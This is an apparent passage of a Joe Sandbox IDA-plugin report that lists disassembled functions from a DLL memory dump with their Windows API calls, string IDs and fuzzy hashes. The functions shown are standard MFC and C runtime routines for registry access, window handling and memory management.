                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CloseEnumH_prolog3_OpenQueryValue
                                        • String ID: Software\
                                        • API String ID: 1666054129-964853688
                                        • Opcode ID: 382c0eb9e6b49433e8282e06d56987f49af73cf3d244ba63e35f93558c34b435
                                        • Instruction ID: caefdeae8b7919eccfda31ca18c49636fc9faca00a324f6883b3fcfd0ac22e5c
                                        • Opcode Fuzzy Hash: 382c0eb9e6b49433e8282e06d56987f49af73cf3d244ba63e35f93558c34b435
                                        • Instruction Fuzzy Hash: FA41B531840618EBCB21DBA4DD88EDEBFB9AF49714F2002D9F015E6190DB369B94CF50
                                        APIs
                                        • __EH_prolog3_catch_GS.LIBCMT ref: 6FEAA08C
                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FEAA11A
                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FEAA13D
                                          • Part of subcall function 6FEAA02D: __EH_prolog3.LIBCMT ref: 6FEAA034
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: EnumH_prolog3H_prolog3_catch_Open
                                        • String ID: Software\Classes\
                                        • API String ID: 3518408925-1121929649
                                        • Opcode ID: 433733f69c420ec4ab2b8f09443296d263a94e64c5803b522813518b906fe1d3
                                        • Instruction ID: 1b2dee1beac06a0f38d3bae99322e750f9bdae0f27d13a5c6393d67bb146c417
                                        • Opcode Fuzzy Hash: 433733f69c420ec4ab2b8f09443296d263a94e64c5803b522813518b906fe1d3
                                        • Instruction Fuzzy Hash: 9B318271C44228FACB229BE4DD48BDDBFB5AF19324F2402DAE8596B290C7315F849F51
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FEAD0AE
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FEAD0D1
                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FEAD0ED
                                        • RegCloseKey.ADVAPI32(?), ref: 6FEAD0FD
                                        • RegCloseKey.ADVAPI32(?), ref: 6FEAD107
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CloseCreate$Open
                                        • String ID: software
                                        • API String ID: 1740278721-2010147023
                                        • Opcode ID: 27803853be5e3eedf599c90054f432781176de7332d2393c5b0ccd08c37b44f6
                                        • Instruction ID: becbfe6dc1011b1bf0a68231f640dc229d62a56e9c2cf589a5778eba40f535ce
                                        • Opcode Fuzzy Hash: 27803853be5e3eedf599c90054f432781176de7332d2393c5b0ccd08c37b44f6
                                        • Instruction Fuzzy Hash: D7112B76D00118BBCB21DA9ACD88CDFBFBEEFCA714F2100AAF514A2111D7319A10DB60
                                        APIs
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABEB5
                                        • __CxxThrowException@8.LIBCMT ref: 6FEABEBF
                                          • Part of subcall function 6FEB527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6FEB52BD
                                        • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FEAAF00,6FEA6DDD,6FEA68AD,?,6FEB4902,?), ref: 6FEABED6
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABEE3
                                          • Part of subcall function 6FEA6D89: __CxxThrowException@8.LIBCMT ref: 6FEA6D9F
                                        • _memset.LIBCMT ref: 6FEABF02
                                        • TlsSetValue.KERNEL32(?,00000000), ref: 6FEABF13
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FEABF34
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                        • String ID:
                                        • API String ID: 356813703-0
                                        • Opcode ID: 54c51830d44b06f6bf8d0c9e3d25659fe3dba126ac1fb85ecd788d6000e6e75d
                                        • Instruction ID: 2550cdaf3c1d093da0e84b74fcb48b4ecb604bf77b77369200a6ee010a6de9fd
                                        • Opcode Fuzzy Hash: 54c51830d44b06f6bf8d0c9e3d25659fe3dba126ac1fb85ecd788d6000e6e75d
                                        • Instruction Fuzzy Hash: EB118E74500609AFDB11AF68CD85C2ABFB9FF42324B20C53EF6659A664CB31AD60CF50
                                        APIs
                                        • __getptd.LIBCMT ref: 6FEBFE1A
                                          • Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
                                          • Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F
                                        • __amsg_exit.LIBCMT ref: 6FEBFE3A
                                        • __lock.LIBCMT ref: 6FEBFE4A
                                        • InterlockedDecrement.KERNEL32(?), ref: 6FEBFE67
                                        • InterlockedIncrement.KERNEL32(00E31610), ref: 6FEBFE92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                        • String ID: $o
                                        • API String ID: 4271482742-1314351406
                                        • Opcode ID: c14e630f1bb7baf8bb8c25cba7a976b5037ac60f7aec3dbc43a2cedc872c4fe9
                                        • Instruction ID: c8164e1d0f5e7a6bc1a055c4040517a4dd96ed525a13f661ee7b2aaf7b1a01cb
                                        • Opcode Fuzzy Hash: c14e630f1bb7baf8bb8c25cba7a976b5037ac60f7aec3dbc43a2cedc872c4fe9
                                        • Instruction Fuzzy Hash: 1501A13A901B619BDF119BA88F047AE7FA0AF46738F20010EE81067691C738B952CBD5
                                        APIs
                                        • SetErrorMode.KERNEL32(00000000), ref: 6FEACA85
                                        • SetErrorMode.KERNEL32(00000000), ref: 6FEACA8D
                                          • Part of subcall function 6FEAA698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FEAA6D0
                                          • Part of subcall function 6FEAA698: SetLastError.KERNEL32(0000006F), ref: 6FEAA6E7
                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FEACADC
                                        • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FEACAEC
                                          • Part of subcall function 6FEAC8E2: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FEAC91F
                                          • Part of subcall function 6FEAC8E2: PathFindExtensionW.SHLWAPI(?), ref: 6FEAC939
                                          • Part of subcall function 6FEAC8E2: __wcsdup.LIBCMT ref: 6FEAC983
                                          • Part of subcall function 6FEAC8E2: __wcsdup.LIBCMT ref: 6FEAC9C2
                                          • Part of subcall function 6FEAC8E2: __wcsdup.LIBCMT ref: 6FEACA14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
                                        • String ID: NotifyWinEvent$user32.dll
                                        • API String ID: 3531328582-597752486
                                        • Opcode ID: 557d859eb9afb50005227ac7e204b4a02b03694781892fecf38e98ec48a00e86
                                        • Instruction ID: d249c2250cb1e641a633dcf4fbf48fd112816cdb3db80c69254b7ab3b899498f
                                        • Opcode Fuzzy Hash: 557d859eb9afb50005227ac7e204b4a02b03694781892fecf38e98ec48a00e86
                                        • Instruction Fuzzy Hash: FB01B1706543148FCB10EF689904A5E3FD8AF45B18B25809EB955DF281DB32D840CF62
                                        APIs
                                        • GetSysColor.USER32(0000000F), ref: 6FEACD2E
                                        • GetSysColor.USER32(00000010), ref: 6FEACD35
                                        • GetSysColor.USER32(00000014), ref: 6FEACD3C
                                        • GetSysColor.USER32(00000012), ref: 6FEACD43
                                        • GetSysColor.USER32(00000006), ref: 6FEACD4A
                                        • GetSysColorBrush.USER32(0000000F), ref: 6FEACD57
                                        • GetSysColorBrush.USER32(00000006), ref: 6FEACD5E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Color$Brush
                                        • String ID:
                                        • API String ID: 2798902688-0
                                        • Opcode ID: 270117930192d15761f40ec4f1739e1d6983b166af64d02eb61b505c0ff77e4b
                                        • Instruction ID: 64dd7aae0c6e985964cc8c9d4b2cc2173e0b91e28a1d103724191b11f0608cae
                                        • Opcode Fuzzy Hash: 270117930192d15761f40ec4f1739e1d6983b166af64d02eb61b505c0ff77e4b
                                        • Instruction Fuzzy Hash: 3BF0FE719407445BDB30BB764909B47BED1FFC5720F16192EE2858B990D6B6E441DF40
                                        APIs
                                        • GetWindowLongW.USER32(?,000000F0), ref: 6FEA818D
                                        • GetParent.USER32(?), ref: 6FEA819B
                                        • GetParent.USER32(?), ref: 6FEA81AE
                                        • GetLastActivePopup.USER32(?), ref: 6FEA81BF
                                        • IsWindowEnabled.USER32(?), ref: 6FEA81D3
                                        • EnableWindow.USER32(?,00000000), ref: 6FEA81E6
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                        • String ID:
                                        • API String ID: 670545878-0
                                        • Opcode ID: 8d8a29e5d6da18b2e53175b172ceaf65c92fd54c499112f9eba8babc55d4e7fc
                                        • Instruction ID: a7509d2bae3cf696bfc85b3210732f30267b5e1ea04c19ab15253ade9be07526
                                        • Opcode Fuzzy Hash: 8d8a29e5d6da18b2e53175b172ceaf65c92fd54c499112f9eba8babc55d4e7fc
                                        • Instruction Fuzzy Hash: 8711C83260D6B06BD7131A698D40B9A7FA86F66B68F250267FC10DF340C762EF01C6D1
                                        APIs
                                        • __CreateFrameInfo.LIBCMT ref: 6FEBC43E
                                          • Part of subcall function 6FEB4FC4: __getptd.LIBCMT ref: 6FEB4FD2
                                          • Part of subcall function 6FEB4FC4: __getptd.LIBCMT ref: 6FEB4FE0
                                        • __getptd.LIBCMT ref: 6FEBC448
                                          • Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
                                          • Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F
                                        • __getptd.LIBCMT ref: 6FEBC456
                                        • __getptd.LIBCMT ref: 6FEBC464
                                        • __getptd.LIBCMT ref: 6FEBC46F
                                        • _CallCatchBlock2.LIBCMT ref: 6FEBC495
                                          • Part of subcall function 6FEB5069: __CallSettingFrame@12.LIBCMT ref: 6FEB50B5
                                          • Part of subcall function 6FEBC53C: __getptd.LIBCMT ref: 6FEBC54B
                                          • Part of subcall function 6FEBC53C: __getptd.LIBCMT ref: 6FEBC559
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                        • String ID:
                                        • API String ID: 1602911419-0
                                        • Opcode ID: 0ab9d3d2cdcb5575018adb5125a0c7f71047ada09d40741a01e7fc22c361a0f4
                                        • Instruction ID: bff48455450713963a29a2c1bd7370caaf8157e25165e6885316c8bd5f79086c
                                        • Opcode Fuzzy Hash: 0ab9d3d2cdcb5575018adb5125a0c7f71047ada09d40741a01e7fc22c361a0f4
                                        • Instruction Fuzzy Hash: C311C3B1D44309DFDF00DFA8CA44AAD7BB1FF58319F24816EE814A7290EB399A159F50
                                        APIs
                                        • ClientToScreen.USER32(?,?), ref: 6FEADB6D
                                        • GetDlgCtrlID.USER32(00000000), ref: 6FEADB81
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 6FEADB91
                                        • GetWindowRect.USER32(00000000,?), ref: 6FEADBA3
                                        • PtInRect.USER32(?,?,?), ref: 6FEADBB3
                                        • GetWindow.USER32(?,00000005), ref: 6FEADBC0
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                        • String ID:
                                        • API String ID: 1315500227-0
                                        • Opcode ID: ac37bac2ff37b91351a4aa66f595ebb43832ed475b7b19cd36479814e06d92e1
                                        • Instruction ID: 3aa63d41e3a8bde4599a35eb142eb56b27c43a81cbc5bfcf19ec2fcdd7c273a0
                                        • Opcode Fuzzy Hash: ac37bac2ff37b91351a4aa66f595ebb43832ed475b7b19cd36479814e06d92e1
                                        • Instruction Fuzzy Hash: 33018B3A104419ABCB215F688D08EAE3F6AEF87760F144161FD219A180D735E6228B94
                                        APIs
                                        • GetMenuCheckMarkDimensions.USER32 ref: 6FEA96F2
                                        • _memset.LIBCMT ref: 6FEA976A
                                        • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FEA97CD
                                        • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FEA97E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                        • String ID:
                                        • API String ID: 4271682439-3916222277
                                        • Opcode ID: ddd5341e6028c5f3e04120d92a428180f1b27389f20d632ba7deb5716d2a1002
                                        • Instruction ID: 51b8a1e905f0999393d1c7493ff7bfa819f3bcb7dff992e363ef08454782e40e
                                        • Opcode Fuzzy Hash: ddd5341e6028c5f3e04120d92a428180f1b27389f20d632ba7deb5716d2a1002
                                        • Instruction Fuzzy Hash: 79312471A003289FEB108F688DC5B9D7FB4FB45354F6540BAF549DB2C0DB329A858B60
                                        APIs
                                          • Part of subcall function 6FEAC220: RtlEnterCriticalSection.NTDLL(6FED34A8), ref: 6FEAC25A
                                          • Part of subcall function 6FEAC220: RtlInitializeCriticalSection.NTDLL(?), ref: 6FEAC26C
                                          • Part of subcall function 6FEAC220: RtlLeaveCriticalSection.NTDLL(6FED34A8), ref: 6FEAC279
                                          • Part of subcall function 6FEAC220: RtlEnterCriticalSection.NTDLL(?), ref: 6FEAC289
                                          • Part of subcall function 6FEABB0C: __EH_prolog3_catch.LIBCMT ref: 6FEABB13
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FEB1458
                                        • FreeLibrary.KERNEL32(?), ref: 6FEB1468
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                        • String ID: (Qo$HtmlHelpW$hhctrl.ocx
                                        • API String ID: 2853499158-3778432635
                                        • Opcode ID: d178384706129c545c0a003830d19adee92693d0102d5c9d9b55d713aa362ea9
                                        • Instruction ID: 42d0adc15290e6d45b286fa58fbd447aa2b269019aaa0796f28755791dfbdb93
                                        • Opcode Fuzzy Hash: d178384706129c545c0a003830d19adee92693d0102d5c9d9b55d713aa362ea9
                                        • Instruction Fuzzy Hash: B301AD31504B06ABCB215FA9CF04B4B3FA4AF01368F20C92DF9AA9A190DB35E4108A12
                                        APIs
                                        • __getptd.LIBCMT ref: 6FEBC17F
                                          • Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
                                          • Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F
                                        • __getptd.LIBCMT ref: 6FEBC190
                                        • __getptd.LIBCMT ref: 6FEBC19E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: MOC$csm
                                        • API String ID: 803148776-1389381023
                                        • Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                        • Instruction ID: d267659146bda2766ba9cbd9eb4a1fe47d6d0e5057d2b14fe039c330c5390536
                                        • Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                        • Instruction Fuzzy Hash: F7E04F357582048FDB009BB8C245B683FA4EBA9718F3501AEE91CCB361D735E944DA82
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,?,6FEA49D6,?,00000003), ref: 6FEA5685
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FEA56B4
                                        • GetLastError.KERNEL32 ref: 6FEA56C5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FEA56E5
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FEA5709
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                        • String ID:
                                        • API String ID: 3322701435-0
                                        • Opcode ID: a9a368b88e21cbdded1a4aa15bbad752045301fa32a37d84aea632532b984f20
                                        • Instruction ID: 85edba09edb9873a445454c686d0cb21424fd81a25f4645df3155bc56a693576
                                        • Opcode Fuzzy Hash: a9a368b88e21cbdded1a4aa15bbad752045301fa32a37d84aea632532b984f20
                                        • Instruction Fuzzy Hash: 8D118175384705ABE6249F68DCC5F677BACEBC5754F200929F682AB3C0D671BC098670
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?), ref: 6FEADA3D
                                        • _memset.LIBCMT ref: 6FEADA5B
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FEADA75
                                        • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FEADA87
                                        • SetWindowTextW.USER32(00000000,?), ref: 6FEADA93
                                          • Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
                                          • Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd
                                        Similarity
                                        • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                        • String ID:
                                        • API String ID: 4273134663-0
                                        • Opcode ID: e6c68f282fa2fa638d57593103eaaa73d0d35dd1ebf9664909e13a31c00bf0aa
                                        • Instruction ID: a03ef25e9e4d94bfaf17e53f3587902cdb2d22c670eae7f848e1ce3e4f8819a5
                                        • Opcode Fuzzy Hash: e6c68f282fa2fa638d57593103eaaa73d0d35dd1ebf9664909e13a31c00bf0aa
                                        • Instruction Fuzzy Hash: EA01C4BA5053196BCB10EBB4CD889DF7BADEF46354F104066F915D7241EA34DA0487A0
                                        APIs
                                        • __lock.LIBCMT ref: 6FEB4636
                                          • Part of subcall function 6FEBA914: __mtinitlocknum.LIBCMT ref: 6FEBA92A
                                          • Part of subcall function 6FEBA914: __amsg_exit.LIBCMT ref: 6FEBA936
                                          • Part of subcall function 6FEBA914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6FEBA93E
                                        • ___sbh_find_block.LIBCMT ref: 6FEB4641
                                        • ___sbh_free_block.LIBCMT ref: 6FEB4650
                                        • HeapFree.KERNEL32(00000000,00000000,6FECE828,0000000C,6FEBA270,00000000,?,6FEBA5D4,00000000,00000001,00000000,?,6FEBA89E,00000018,6FECE978,0000000C), ref: 6FEB4680
                                        • GetLastError.KERNEL32(?,6FEBA5D4,00000000,00000001,00000000,?,6FEBA89E,00000018,6FECE978,0000000C,6FEBA92F,00000000,00000000,?,6FEBA32A,0000000D), ref: 6FEB4691
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true
                                        • Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
